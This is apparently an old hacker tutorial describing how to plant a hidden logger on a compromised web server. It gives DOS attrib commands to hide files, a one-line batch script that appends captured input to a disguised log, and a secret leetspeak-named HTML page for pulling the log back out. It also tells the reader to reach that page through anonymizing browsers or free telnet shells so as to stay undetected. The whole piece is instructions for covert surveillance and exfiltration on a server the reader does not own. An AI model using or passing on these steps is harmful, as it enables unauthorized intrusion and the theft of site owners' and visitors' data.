Secret Logging
of a Web Site
If after using
hc.exe, hk.exe and whisker.pl it's still impossible to control, then
resort to this logging procedure.
1. Decide on a name
for a log file. This file will contain appended info of anything
typed, reported in or out of the server. Don't make the file name too
obvious. Some examples:
VERPVT.TXT
VERCLASSJ.TXT
_PVTC.TXT
_SYSREM.TXT
_SYSVER.TXT
_GUEST.TXT
to make it harder
for others to
find, make it a hidden file
c:\windows>attrib _GUEST.TXT +h
2. Write this
simplest DOS script into a batch file:
echo %1>>_GUEST.TXT
name it
NONSUSPICIOUS.BAT, make it a hidden file
c:\windows>attrib
NONSUSPICIOUS.BAT +h
and upload it to the
server that is at your service.
3. Associate files
opened at the server with the NONSUSPICIOUS batch file
4. Write a simple
web page that only you will know and surf to, because it will report to you all
contents of the _GUEST.TXT file:
<html>
<title>1ns1de1nfo</title>
<body>
<a href="_GUEST.TXT">Cl1ck T0 C4eck</a>
</body>
</html>
The file name
1ns1de1nfo.htm is numeralized so that it would be non-existent to some search application
that happens to be looking for strings like "inside" or
"info."
The only text on this secret web page is the hyperlink Cl1ck T0 C4eck, also
numeralized.
-Hide this file from the rest of
the world:
c:\windows>attrib
1ns1de1nfo.htm +h
To use your sly
page, get a cup of your favorite drink, and type into a good anonymizing
browser or a shell to get to your own page:
http://The.Unsuspecting.Web.Site.com/1ns1de1nfo.htm
And click the Cl1ck
T0 C4eck link.
A shell is better
than a browser. Find some free shells by searching the engines for
"free telnet." Most free telnet accounts have a web browsing
feature, though with no pictures and animations, just the plain text for
you to see. The shell can also be used to check or move things to or
within the The.Unsuspecting.Web.Site.com
Good
luck and be careful.
|